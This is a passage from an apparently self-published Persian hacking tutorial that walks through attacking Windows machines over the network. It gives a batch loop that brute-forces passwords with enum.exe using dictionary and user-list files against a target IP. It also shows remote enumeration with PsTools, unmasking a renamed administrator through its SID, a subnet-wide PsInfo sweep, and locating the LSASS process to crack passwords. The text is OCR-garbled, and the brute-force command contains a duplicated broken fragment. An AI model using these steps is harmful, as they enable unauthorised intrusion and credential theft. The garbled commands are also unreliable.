ﺕﻤﺎم ﻧﺎم ﮐﺎرﺏﺮ هﺎ ﺏﺎ ﻣﺠﻮز ﺡﺴﺎب ﻣﺪیﺮ و... ایﻦ ﮔﻔﺘﻢ ﺕﺎ ﺕﺠﺮﺏﻪ اﺱﺎﺱﯽ ﺧﻮدم را در اﺧﺘﻴﺎر ﺷﻤﺎ هﺎ ﺏﮕﺰارم .یﮏ ﻧﮑﺘﻪ ) ایﻦ ﻣﺜﺎل ﮐﻠﯽ و در ﺏﻘﻴﻪ ﻣﻮارد ه ﻢ ﮐ ﺎرایﯽ دارد " دوﮔﻮﻟ ﻪ " را روﺷ ﻦ ﮐﻨﻴﺪ( اﮔﺮ ﺷﻤﺎ ﺕﻤﺎم ﻧﺎم ﮐﺎرﺏﺮ هﺎ ﺏﺎ ﻣﺠﻮز ﻣﺜﻼ limitرا ﺏﺪاﻧﻴﺪ اﺡﺘﻤﺎل ﭘﻴﺪا ﮐﺮدن ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺮای ﺡﺪاﻗﻞ یﮑﯽ از ﻧﺎﻣﻬﺎی ﮐﺎرﺏﺮ ﺏﺮای ﺷﻤﺎ ﺏﻴ ﺸﺘﺮ اﺱﺖ) ﭼﺮای ایﻦ ﻗﻀﻴﻪ را ﺧﻮدﺕﺎن ﺏﻔﻬﻤﻴﺪ !! ( ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ ﻧﮑﺘﻪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻣﺴﺎﺋﻞ ﺏﺎﻻ از ﻓﺮﻣﺎن زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ : u
C:\> for /F %%p in ( dict.txt ) do for /F %%u in (users.txt) do enum.exe %% u in (usres.txt) do enum.exe %%u p %%p M xxx.xxx.xxx.xxx >> output.txt
ایﻦ روش هﻨﮕﺎﻣﯽ ﺏﻪ اوج ﺱﻮﭘﺮ ﺧﻔﻨﯽ ﻣﻴﺮﺱﺪ ﮐﻪ ﻓﺎیﻞ ﺡﺎوی ﮐﻠﻤﺎت ﻋﺒﻮر ﮐﻮﭼﮏ ) ﺕﻌﺪاد ﮐﻤﺘﺮی ﮐﻠﻤﻪ( و ﻓﺎیﻞ ﺡﺎوی ﻧﺎم ﮐﺎرﺏﺮان ﺏﺰرگ ﺏﺎﺷﺪ. ﺧﻮب اﻻن ﮐﻪ داﺷﺘﻢ دوﺏﺎرﻩ ایﻦ ﻣﺒﺤﺚ ﻣﻴﺨﻮاﻧﺪم دیﺪم ﺏﺮﺧﻼف رویﻪ ایﻦ ﻣﻘﺎﻟﻪ ﺕﻤﺎم ﻧﮑﺎت و ﺕﺠﺮﺏﻪ هﺎی ﺧﻮدم را ﻧﻴﺰ رو ﮐﺮدﻩ ام اﻣﺎ اﺷ ﮑﺎل ﻧ ﺪارد ﺏﻌﻀﯽ هﺎ را هﻢ ﻣﻦ از ایﻦ ﺁن یﺎد ﮔﺮﻓﺘﻢ و از اول ﮐﻪ زایﻴﺪﻩ ﺷﺪم هﮑﺮ ﮐﻪ ﻧﺒﻮدم !! یﮏ ﺱﺮی هﺎ را ﺧﻮدم ﮐﺸﻒ ﮐﺮدم ﺏﻴﺸﺘﺮ ﺁن را ه ﻢ دیﮕ ﺮان ، ﭘﺲ ﺏﮕﺰار ﻣﻦ ﺏﻪ دیﮕﺮان هﺮ ﭼﯽ ﺏﻠﺪ هﺴﺘﻢ یﺎد ﺏﺪم . ﺟﻌﺒﻪ اﺏﺰار : Pstools ﺧﻮب اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻴﺨﻮاهﻢ یﺎد ﺏﺪهﻢ ﺟﻌﺒﻪ اﺏﺰار Pstoolsاﺱﺖ ﮐﻪ ﺧﻼ ﻣﻮﺟﻮد ﺏﻴﻦ دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت ﮐﺎرﺏﺮان ﺱﻴﺴﺘﻢ و دﺱﺘﺮﺱ ﯽ ﮐﺎﻣ ﻞ ﺏ ﻪ ﺧﻮد ﺱﻴﺴﺘﻢ را ﭘﺮ ﻣﻴﮑﻨﺪ .ایﻦ ﻣﺠﻤﻮﻋﻪ ﺏﻪ هﻤﺖ ﺁﻗﺎی Mark Russinovichﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ و از ایﻨﺠﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﺮیﺪ.ایﻦ ﺟﻌﺒﻪ اﺏ ﺰار ی ﮏ ﮐﻮﭼﻮﻟ ﻮ ﻣﺸﮑﻞ دارد و ﺁن هﻢ ایﻦ اﺱﺖ ﮐﻪ ﭼﻮن اﺱﺎس ﺏﺮ ﺟﻤﻊ ﺁوری ﺡﺪاﮐﺜﺮ اﻃﻼﻋﺎت ﻣﻤﮑﻦ ﮔﺬاﺷﺘﻪ ﺷ ﺪﻩ ﺏ ﺮ ﺧ ﻼف دو اﺏ ﺰاری ﮐ ﻪ ﺏ ﺎﻻ ﺕﻮﺽ ﻴﺢ دادم از اﺕﺼﺎل ﻧﺎﺷﻨﺎس ) ( NULLاﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ و یﮏ ﮐﻤﯽ رد دﺱﺖ ﻧﻤﻴﺪوﻧﻢ ﺷﺎیﺪ ﭘﺎ هﻢ ﺏﮕﺬارد. ﺏﺮای ایﻦ ﮐﻪ ایﻦ ﻣﺠﻤﻮﻋﻪ درﺱﺖ ﮐﺎر ﮐﻨﺪ و ﻣﺎ ﻧﺘﻴﺠﻪ ﺡﺪاﮐﺜﺮی ﺏﮕﻴﺮیﻢ ﺏﺎیﺪ ﺡﺪاﻗﻞ ﭼﻨﺪ ﺷﺮط زیﺮ ﻧﺼﻔﻪ ﻧﻴﻤﻪ ﺏﺮﻗﺮار ﺏﺎﺷﺪ • ﻻزم اﺱﺖ ﺏﻪ اﻃﻼﻋﺎت ﮐﺎرﺏﺮان دﺱﺖ رﺱﯽ داﺷﺘﻪ ﺏﺎﺷﻴﻢ. • ﻻزم اﺱﺖ یﮏ ﺱﺮویﺴﯽ ﺏﻪ ﻧﺎم Serverروی ﺁن ﻣﺎﺷﻴﻦ راﻩ ﺏﯽ اﻧﺪازیﻢ.ﺏﺪ ﻧﻴﺴﺖ ﺱﺮویﺲ Net Logonهﻢ ﺏﺎﺷﺪ. • ﺏﺪ ﻧﻴﺴﺖ ﺏﻪ Registryدﺱﺖ رﺱﯽ از راﻩ دور داﺷﺘﻪ ﺏﺎﺷﻴﻢ. • ﻣﻨﺒﻊ ﻣﺸﺘﺮک IPC$ﺏﺎیﺪ در دﺱﺘﺮس ﺏﺎﺷﺪ. ایﻦ ﺟﻌﺒﻪ اﺏﺰار ١٠ﺏﺮﻧﺎﻣﻪ هﻠﻮ دارد ﮐﻪ ﺏﻪ واﻗﻊ ﻓﺮایﻨﺪ ﻣﺪیﺮیﺖ ﺱﻴ ﺴﺘﻢ را ﺏ ﻪ ﻟﺤﻈ ﺎت ﺷ ﻴﺮیﻨﯽ ﺕﺒ ﺪیﻞ ﻣﻴﮑﻨ ﺪ.از ﻗﺎﺏﻠﻴﺘﻬ ﺎی ای ﻦ ﻣﺠﻤﻮﻋ ﻪ ﻣﻴﺘ ﻮان ﺏ ﻪ دﺱﺘﺮﺱﯽ ﺏﻪ ﭼﻨﺪیﻦ ﻣﺎﺷﻴﻦ در ﺁن واﺡﺪ و اﺟﺮای دﺱﺘﻮر هﺎ روی ﺁﻧﻬﺎ و) ...ﺧﻴﻠﯽ زیﺎد اﻣﮑﺎﻧﺎت ﺁن و( ... اﺏﺰار اول : PsFile
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٤
ﺷﻤﺎ ﺏﺎ ایﻦ اﺏﺰار ﻣﯽ ﺕﻮاﻧﻴﺪ ﻓﺎیﻠﻬﺎی ﮐﻪ ﻣﺎﺷﻴﻨﯽ دارد از ﻣﺎﺷﻴﻦ دیﮕﺮ) هﻤﺎن ﻣﺎﺷﻴﻦ اﺟﺮا ﮐﻨﻨﺪﻩ دﺱﺘﻮر( اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﺁﺷﮑﺎر ﻧﻤﻮد .ﺏﻪ ﮔﻮﻧﻪ ایﯽ ﻣ ﯽ ﺷﻮد ﮔﻔﺖ ﮐﻪ اﻧﮕﺎر از ﻓﺮﻣﺎن Net fileاﺱﺘﻔﺎدﻩ ﮐﺮدﻩ ایﺪ .ﺧﻮب ایﻦ اﺏﺰار ﺏ ﻪ درد ﻣ ﺪیﺮ ﺏﻴ ﺸﺘﺮ ﺏﺨ ﻮرد ﺕ ﺎ ﻣ ﺎ ﭼ ﻮن ﺏ ﺎ ﺁن ﻣ ﯽ ﺕﻮاﻧ ﺪ ﺟﻬ ﺖ اﺷ ﮑﺎل زدایﯽ در اﺷﺘﺮاک ﻓﺎیﻠﻬﺎ و رد یﺎﺏﯽ ﻏﻴﺮ ﻣﺠﺎز دﺱﺘﺮﺱﯽ هﺎ و ...ﮐﺎرایﯽ دارد. ﺧﻮب ایﻦ یﮏ ﺏﺎر ﻣﻴﮕﻮیﻢ ﺏﺮای ﮐﻞ ایﻦ اﺏﺰارهﺎ .ﺕﻤﺎم ایﻦ اﺏﺰار هﺎ را ﻣﯽ ﺕﻮان ﺏﻪ ﺻﻮرت زیﺮ ﺏﺮای ﮐﺎر ﺏﺮد از راﻩ دور اﺱﺘﻔﺎدﻩ ﮐﺮد: \\RemotHost -u user name -p password اﺏﺰار : PsLoggedOn اﺏﺰار ﺏﻌﺪی ﮐﻪ ﺁن هﻢ ﻓﻘﻂ اﻧﺪﮐﯽ ﺏﺪرد ﻣﺎ ﻣﻴﺨﻮرد اﺏﺰار PsLoggedOnاﺱﺖ ﮐﻪ ﮐﺎرش ایﻦ اﺱﺖ ﻟﻴﺴﺘﯽ از ﮐﺎر ﺏﺮاﻧﯽ را ﮐﻪ از ﻃﺮی ﻖ راﻩ دور ﺏﻪ یﮏ ﻣﻨﺒﻊ ﻣﺸﺘﺮک ﻣﺘﺼﻞ ﺷﺪﻩ اﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ.از دیﺪ ﮔ ﺎﻩ ی ﮏ اﻧ ﺴﺎن ﺏ ﺪ راﻩ اﻧ ﺪاﺧﺘﻦ ی ﮏ ﺡﺮﮐ ﺖ ﺡﻤﻠ ﻪ ﮔﻮﻧ ﻪ از ﻣ ﺪل ﺱ ﺮریﺰی ﺏ ﺎﻓﺮ ﺏ ﻪ ﻣﺎﺷﻴﻨﯽ ﮐﻪ ﺕﻌﺪادی ﮐﺎرﺏﺮ ﺏﻪ ﺁن ﻣﺘﺼﻞ هﺴﺘﻨﺪ زیﺎد ﺟﺎﻟﺐ ﻧﺒﺎﺷﺪ . اﺏﺰار : Ps Get Sid اﺏﺰار ﺱﻮﻣﯽ ﮐﻪ ﻣﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار Ps Get Sidاﺱﺖ ﮐﻪ هﻤ ﺎﻧﻄﻮر ﮐ ﻪ از ﻧ ﺎم ﺁن ﻣﻴﻔﻬﻤﻴ ﺪ ﺏ ﻪ ﻣ ﺎ ﻣﻴﮕﻮی ﺪ ﮐ ﻪ SIDی ﮏ ﺡ ﺴﺎب ﮐ ﺎرﺏﺮ ﭼﻨ ﺪ اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ داﻧﺴﺘﻦ ایﻦ ﻣﻮﺽﻮع ﻣﻴﻔﻬﻤﻴﻢ ﮐﻪ ﻣﺜﻼ هﻤﻴﺸﻪ ﺡﺴﺎب ﻣﺪیﺮ ﺁﺧﺮ Sidﻋﺪد ۵٠٠و ﺡﺴﺎب ﻣﻴﻬﻤﺎن ﻋ ﺪد ۵٠١اﺱ ﺖ .در ﻧﺘﻴﺠ ﻪ دیﮕ ﺮ ﺏﺎ ﻋﻮض ﮐﺮدن ﻧﺎم ﺡﺴﺎب ﻣﺪیﺮ ﺏﻪ ﻣﻴﻬﻤﺎن ﻣﺎ ﮔﻮل ﻧﻤﯽ ﺧﻮریﻢ و ... C:\> psgetsid.exe \\ xxx.xxx.xxx.xxx -u Administrator -p ﺏﻌﺪ ایﻨﺠﻮری ﺟﻮاب ﻣﻴﺪهﺪ: IM! Secure ORC SID for xxx.xxx.xxx.xxx \\ OCR: S-1-5-21-145-4471165-484763869-1708537768-501 ﺧﻮب ﺡﺎﻻ ﻣﺎ ﻣﻴﻔﻬﻤﻴﻢ ﮐﻪ ایﻦ ﺁﻗﺎی ﻣﺪیﺮ ﻧﺎم ﮐﺎرﺏﺮی ﺡﺴﺎب ﻣﻬﻤﺎن را ﻋﻮض ﮐﺮدﻩ و ﮔﺬاﺷﺘﻪ ﻣﺪیﺮ !!!! ﺧﻮب ایﻦ ﺏﮕﻮیﻢ ﮐﻪ ﻻزم ﻧﻴﺴﺖ ﺕ ﺎ در ﺧﻮاﺱ ﺖ SIDدر ﻣ ﻮرد ی ﮏ ﮐ ﺎرﺏﺮ ﺧ ﺎص اﻋﻤ ﺎل ﺷ ﻮد ای ﻦ ﺏﮕ ﻢ ﮐ ﻪ ﻣﻴﺘﻮاﻧ ﺪ ﺷﻨﺎﺱ ﻪ ﺱ ﺎیﺮ ﮐﺎرﺏﺮه ﺎی ی ﮏ ﺱﻴﺴﺘﻢ را هﻢ ﺏﺮﮔﺮداﻧﺪ. اﺏﺰار : PsInfo اﺏﺰار) (۴ﭼﻬﺎرﻣﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ و ﺧﻴﻠﯽ هﻢ ﺧﻮب اﺱﺖ اﻣﺎ ﻓﻘﻂ ﺏﻪ ﺻﻮرت ﻣﺤﻠﯽ اﺟﺮا ﻣﻴﺸﻮﻧﺪ از راﻩ دور ﻣﺘﺎﺱﻔﺎﻧﻪ اﺏﺰار PsInfoاﺱﺖ ﮐﻪ ﮐﺎر ﺁن ﺷﻨﺎﺱﺎیﯽ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ریﺸﻪ اﺻﻠﯽ و ﻟﻴﺴﺖ Hot fixهﺎی ﻧﺼﺐ ﺷﺪﻩ و ...را ﻣﻴﺪهﺪ ﺏﻪ ﻣﺎ.ﺧﻮب اﮔﺮ ﺷﻤﺎ ﺏﻪ Registryدﺱﺘﺮﺱﯽ از راﻩ دور داریﺪ ﻣﻴﺘﻮاﻧﻴﺪ از ﺷﺎﺧﻪ زیﺮ در Registryﺏﻪ هﻤﻴﻦ اﻃﻼﻋﺎت دﺱﺖ یﺎﺏﻴﺪ . HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix ﺧﻮب ﺏﺮای رﻓﻊ ﻋﻴﺐ ﻧﻪ ﭼﻨﺪان ﮐﻮﭼﮏ ایﻦ اﺏﺰار ﺏﺪرد ﺏﺨﻮر هﻢ یﮏ راﻩ اﺱﺖ و ﺁن هﻢ اﺱﺘﻔﺎدﻩ از دﺱﺘﻮر: C:\>for /L %I in (1, 1, 254) do PsInfo \\xxx.xxx.xxx.xxx.%i > systeminfo_xxx.xxx.xxx.xxx. %i.txt ﺕﻮﺟﻪ ﮐﻨﻴﺪ ایﻦ ﺏﭻ ﻓﺎیﻞ ﺏﺪون ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر اﺱﺖ ﮐﻪ ﺏﻬﺘ ﺮ اﺱ ﺖ ﺏ ﺮای ﺷ ﻤﺎ ه ﺎ ه ﻢ هﻤ ﻴﻦ ﺟ ﻮر ﺏﺎﺷ ﺪ و ﺡﺘﻤ ﺎ ﺁن را در ﻗﺎﻟ ﺐ ﮐ ﺎرﺏﺮی از ﺡﻮزﻩ ﻣﻮرد ﻧﻈﺮ اﺟﺮا ﮐﻨﻴﺪ . اﺏﺰار : PsService اﺏﺰار ) ( ۵ﭘﻨﺠﻢ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﯽ ﮐﻨﻢ اﺏﺰار PsServiceاﺱﺖ ﮐﻪ ﮐﺎرش راﻩ اﻧ ﺪاﺧﺘﻦ و ﻣﺘﻮﻗ ﻒ ﮐ ﺮدن ﺱ ﺮویﺲ ه ﺎ و ﻧ ﺸﺎن دادن ﮐ ﻞ ﺱﺮوی ﺴﻬﺎی اﺟﺮا ﺷﺪﻩ ﻣﯽ ﺏﺎﺷﺪ .ایﻦ اﺏﺰار ﺧﻴﻠﯽ ﺷﺒﻴﻪ دو ﻓﺮﻣﺎن Net Startو Net Stopاﺱﺖ.اﮔﺮ ای ﻦ اﺏ ﺰار را ﺕﻨﻬ ﺎ ﺏ ﺪون ه ﻴﭻ ﺱ ﻮیﭻ اﺟ ﺮا ﮐﻨﻴ ﺪ ﻟﻴ ﺴﺖ ﺕﻤﺎم ﺱﺮویﺲ هﺎ را ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ. ﺷﻤﺎ ﺏﺎ ﻓﺮﻣﺎن زیﺮ ﻣﯽ ﺕﻮاﻧﻴﺪ ﻣﺜﻼ ﺱﺮویﺴﯽ را روی یﮏ ﻣﺎﺷﻴﻦ از راﻩ دور ﺷﺮوع و یﺎ ﻣﺘﻮﻗﻒ ﮐﻨﻴﺪ: C :> psservice.exe \\xxx.xxx.xxx.xxx Start W3svc ﮐﻪ ایﻦ ﻓﺮﻣﺎن ﺱﺮویﺲ IISرا روی یﮏ ﺱﺮور ﺁﭘﺎﭼﯽ راﻩ ﻣﯽ اﻧﺪازد !! ﺱﻮیﭻ queryاﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ وﺽﻌﻴﺖ ﺱﺮویﺲ در اﺧﺘﻴﺎر ﻣﺎ ﻣﻴﮕﺰارد . ﺱﻮیﭻ Configاﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ ﺏﺮﻧﺎﻣﻪ ایﯽ ﮐﻪ ﺱﺮویﺲ ﻣﻮرد ﻧﻈﺮ در ﺡﺎل اﺟﺮای ان اﺱﺖ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ . ﺱﻮیﭻ Findﺏﺮای ﺁﺷﮑﺎر ﮐﺮدن ﺱﺮویﺲ هﺎی در ﺡﺎل اﺟﺮا روی ﺷﺒﮑﻪ اﺱﺖ . ﻣﺜﻼ ﺏﻪ ﻣﻨﻈﻮر ﮐﺸﻒ ﮐﺮدن ﻣﻴﺰﺏﺎن هﺎیﯽ از یﮏ ﺡﻮزﻩ ﺷ ﺒﮑﻪ ﮐ ﻪ ﺱ ﺮویﺲ Terminal Servicesرا اﺟ ﺮا ﻣﻴﮑﻨﻨ ﺪ ﻣ ﯽ ﺕ ﻮان دﺱ ﺘﻮر را ایﻨﮕﻮﻧ ﻪ ﻧﻮﺷﺖ . C :\> psservice.exe find termservice Found termservice.exe on: \\sun 1 \\rostay 3 ﺧﻮب ایﻦ ﺏﮕﻢ ﮐﻪ ﺷﻤﺎ ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﻧﺮم اﻓﺰار و یﮏ اﺱﮑﻨﺮ ﭘﻮرت ﻣﻴﺘﻮاﻧﻴﺪ ﺱﺮویﺴﻬﺎی ﻣﺴﺌﻠﻪ دار را ﮐﺸﻒ ﮐﻨﻴﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٥
اﺏﺰار Pslist اﺏﺰار ) (۶ﺷﺸﻢ ﺧﻮب ﺏﺎ ایﻦ ﻣﻴﺘﻮاﻧﻴﺪ ﺡﺎل ﺁﻧﻬﺎیﯽ را ﮐﻪ ﺏﺎ داﺷﺘﻦ ﻟﻴﻨﻮﮐﺲ هﯽ ،ﭼﭗ ﻣﻴﺮﻧﺪ راﺱﺖ ﻣﻴﺮﻧﺪ و… ﺏ ﺮای ﺷ ﻤﺎ " ﻗﻤ ﭙﺾ " ﻣ ﯽ ﺕﺮﮐﺎﻧﺪﻧ ﺪ را ﺱﺮ ﺟﺎیﺸﺎن ﺏﻨﺸﺎﻧﯽ ﭘﺴﺮم ) !!.ﺏﻠﻪ ایﻦ ﻣﻘﺎﻟﻪ را ﻓﻘﻂ ﺏﺮای ﭘﺴﺮهﺎ ﻧﻮﺷﺘﻢ ( اﺱﻢ ایﻦ اﺏﺰار Pslistاﺱﺖ. ایﻦ اﺏﺰار ﺕﻮاﻧﺎیﯽ ﻟﻴﺴﺖ ﮐﺮدن ﻓﺮایﻨﺪ هﺎی ﻣﻮﺟﺪ ﺏﺮروی ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ یﺎ یﮏ ﺱﻴ ﺴﺘﻢ از راﻩ دور را دارا ﻣﻴﺒﺎﺷ ﺪ و ﺏ ﺎ اﺽ ﺎﻓﻪ ﮐ ﺮدن ﺱ ﻮیﭻ ه ﺎی d و mو xﺏﻪ ﺕﺮﺕﻴﺐ اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ Threadهﺎ و ﺡﺎﻓﻈﻪ و یﺎ ﺕﺮﮐﻴﺒﯽ از ایﻦ دو را ﻧﻤﺎیﺶ دهﺪ.ایﻦ اﺏﺰار هﻢ ﻣﻴﺘﻮاﻧﺪ ﺏﻪ ﺻﻮرت ﮐﻠﯽ ) اﺟ ﺮای ﺧﺎﻟﯽ Pslist.exeدر ﺧﻂ ﻓﺮﻣﺎن ( هﻤﻪ ﭘﺮوﺱﻪ هﺎ را ﻧﻤﺎیﺶ دهﺪ وه ﻢ ﻣﻴﺘﻮاﻧ ﺪ ی ﮏ ﭘﺮوﺱ ﻪ ﺧ ﺎص را ﺏ ﺎ ﺟﺰیﻴ ﺎت ﺏﻴ ﺸﺘﺮ ﻧﻤ ﺎیﺶ ده ﺪ ﻣ ﺜﻼ ﺏ ﻪ ای ﻦ ﺻﻮرت : C :\> Pslist.exe iexplorer ﺷﻤﺎ ﺏﻪ ﺟﺎی iexplorerﻣﻴﺘﻮاﻧﻴﺪ هﺮ ﭘﺮوﺱﻪ ای را ﮐﻪ دوﺱﺖ داریﺪ ﺏﻨﻮیﺴﻴﺪ. اﺱﺘﻔﺎدﻩ ایﻦ ﮔﻮﻧﻪ از اﺏﺰار ﺏﻴﺸﺘﺮ در ﻣﻮاﻗﻌﯽ ﮐﻪ ﺏﺨﻮاهﻴﻢ ﮐﻠﻤﻪ ﻋﺒﻮری را ﮐﺸﻒ ﮐﻨﻴﻢ ﻣﻮﺙﺮ اﺱﺖ زیﺮا ﺏﺎ اﺟ ﺮای ای ﻦ دﺱ ﺘﻮر دﺱ ﺖ ی ﺎﺏﯽ ﺏ ﻪ ﺷﻨﺎﺱ ﻪ ﻓﺮﺁیﻨﺪ ) یﺎ ( PIDﺏﺮﻧﺎﻣﻪ ) LSASSیﺎ هﺮ ﺏﺮﻧﺎﻣﻪ رﻣﺰﻧﮕﺎری دیﮕﺮ( ﺏﻪ راﺡﺘﯽ ﻣﻤﮑﻦ اﺱﺖ اﻟﺒﺘﻪ ای ﻦ اﺏ ﺰار در ای ﻦ زﻣﻴﻨ ﻪ ﻣ ﺎﻓﻮق دﮐﺘ ﺮا ﮔﺮﻓﺘ ﻪ اﺱﺖ از اﻧﺠﻤﻦ ﮐﺮﮐﺮ هﺎ !!! ﺱﻮیﭻ Sدر ایﻦ اﺏﺰار ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﻪ ﺡﺎﻟﺖ Task Managerﺏﺮدﻩ و ﺏﺮﻧﺎﻣﻪ داﺋﻤﺎ در ﺡﺎل ﻧﻮﺱ ﺎزی وﺽ ﻌﻴﺖ ﺱﻴ ﺴﺘﻢ ﺧﻮاه ﺪ ﺏ ﻮد )دﻗﻴﻘ ﺎ ﻣ ﺸﺎﺏﻪ ﻓﺮﻣﺎن tcpدر ﻟﻴﻨﻮﮐﺲ اﺱﺖ ( . ﺱﻮیﭻ Rﺕﻮاﻧﺎیﯽ ﻣﺸﺨﺺ ﮐﺮدن زﻣﺎن ﻧﻮﺱﺎزی اﻃﻼﻋﺎت را ﺏﺮﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ دارد . ایﻦ دو ﺱﻮیﭻ واﻗﻌًﺎ در زﻣﻴﻨﻪ ﻣﺸﺎهﺪﻩ ﻓﻌﺎﻟﻴﺖ هﺎی ﺱﺮور ﻣﻔﻴﺪ هﺴﺘﻨﺪ .ﺏﻪ ﻧﻤﻮﻧﻪ ایﯽ از ﮐﺎرﺏﺮد ایﻦ دوﺕﺎ ﺏﺎ هﻢ ﺕﻮﺟﻪ ﮐﻨﻴﺪ. C :\> Pslist.exe \\xxx.xxx.xxx.xxx s r 10 inetinfo.exe C :\> Pslist.exe s r 10 inetinfo.exe ﺧﻮب ﮐﻪ ایﻦ ﻓﺮﻣﺎن را روی ی ﮏ ﺱ ﺮو اﺟ ﺮا ﮐ ﺮدﻩ و در ﺟ ﻮاب ﺏ ﻪ ﻣ ﺎ ﻣﻴﮕﻮی ﺪ :ه ﺮ ١٠ﺙﺎﻧﻴ ﻪ ی ﮏ ﺏ ﺎر از ﺁﺧ ﺮیﻦ وﺽ ﻌﻴﺖ ﺱ ﺮویﺲ IISﺏ ﻪ ﻣ ﺎ اﻃﻼع ﻣﻴﺪهﺪ. ﺱﻮیﭻ Tﺏﺮﻧﺎﻣﻪ را ﻗﺎدر ﻣﻴﮑﻨﺪ ﻓﺮایﻨﺪ را ﺏﻪ هﻤﺮاﻩ Threadهﺎی ﻣﺮﺏﻮﻃﻪ در ﻗﺎﻟﺐ یﮏ ﺱﺎﺧﺘﺎر درﺧﺘﯽ ﻧﻤﺎیﺶ دهﺪ.ﺏ ﺎ ای ﻦ ﮐ ﺎر رواﺏ ﻂ ﻣﺮﺏ ﻮط ﺏ ﻪ اﺟﺮای یﮏ ﭘﺮوﺱﻪ را ﻣﻴﺘﻮان درک ﮐﺮد . اﺏﺰار : PsKill اﺏﺰار ) (٧هﻔﺘﻢ ﺏﺎ ﻧﺎم PsKillو یﺎ PsSuspendﻗﺎدر اﺱﺖ ﮐﻪ یﮏ ﭘﺮوﺱﻪ را ﻧﺎﺏﻮد ﮐﻨﺪ و یﺎ ﺏﻪ ﺡﺎل ﺕﻌﻠﻴﻖ درﺁورد . ﻣﺜﻼ: C :\> pskill.exe notepad 2 processes named notepad killed. ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﺪ ﺏﺎ دریﺎﻓﺖ ﺷﻨﺎﺱﻪ ﻓﺮایﻨﺪ ﻧﻴﺰ ایﻦ ﮐﺎر را اﻧﺠﺎم دهﺪ ﻣﺜﻞ: C :\> pskill.exe 1764 Process #1764 killed ﺏﻬﺘﺮ اﺱﺖ ﺏﻪ ﺟﺎی ﻧﻮﺷﺘﻦ اﺱﻢ ﭘﺮوﺱﻪ ﻣﻮرد ﻧﻈﺮ ﺷﻨﺎﺱ ﻪ ﺁن را ﺏ ﻪ ﮐ ﺎر ﺏﺒﺮی ﺪ زی ﺮا هﻤﻴ ﺸﻪ اﺡﺘﻤ ﺎل ﻧ ﺎﺏﻮد ﺷ ﺪن ﭼﻨ ﺪ ﭘﺮوﺱ ﻪ دیﮕ ﺮ ه ﻢ اﺱ ﺖ ﭼ ﻮن ﻣﻌﻤﻮﻻ ﺏﻪ هﻢ رﺏﻂ دارد .در ﻣﻮﻗﻊ ﺕﺎیﭗ ﺷﻨﺎﺱﻪ ﺏﺎیﺪ دﻗﺖ زیﺎدی ﮐﻨﻴﺪ ﮐﻪ اﺷﺘﺒﺎﻩ ﻧﮑﻨﻴﺪ و ﮔﺮﻧﻪ دیﮕﻪ هﻴﭽﯽ !! اﻟﺒﺘﻪ ﺏﺮای ﮐﺸﻒ ﺷﻨﺎﺱﻪ ﻓﺮایﻨﺪ ﻧﻴﺰ ﻣﻴﺘﻮاﻧﻴﺪ از ﻓﺮﻣﺎﻧﻬﺎی ﮐﻪ ﺏﺎﻻ ﮔﻔﺘﻢ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ وﻟﯽ یﮏ ﺏﺎر دیﮕﺮ هﻢ ﻣﻴﮕﻢ ﺏﺎ دﺱﺘﻮر زیﺮ ایﻦ ﮐﺎر را ﻣﯽ ﺕﻮاﻧﻴ ﺪ اﻧﺠﺎم دهﻴﺪ: C :\> Pslist.exe │ findstr / I notepad Notepad 1764 8 1 30 1728 0:00:00.020 0:00:00.020 0:00:07.077 Notepad 1044 8 1 30 1724 0:00:00.020 0:00:00.020 0:00:07.077 Notepad 1796 8 1 30 1728 0:00:00.010 0:00:00.020 0:00:03.4835 ﻻزم اﺱﺖ ایﻦ ﻧﮑﺘﻪ را ﺏﮕﻮیﻢ دوﺏﺎر ﮐﻪ ایﻦ ﻓﺮایﻨﺪ ﺡﺬف یﮏ ﭘﺮوﺱﻪ ﺕﻤﺎم ﭘﺮوﺱﻪ هﺎی ﻣﺮﺏﻮط ﺏﺎ ﺁن را ﻧﻴﺰ ﺡﺬف ﻣﻴﮑﻨﺪ ﭘﺲ در اﺱﺘﻔﺎدﻩ از ایﻦ دﻗﺖ ﺏﻪ ﺧﺮج ﺏﺪهﻴﺪ یﺎ ایﻨﮑﻪ ﺷﻤﺎ واﻗﻌًﺎ ﻧﻴﺖ ﺕﺨﺮیﺐ داریﺪ!!! 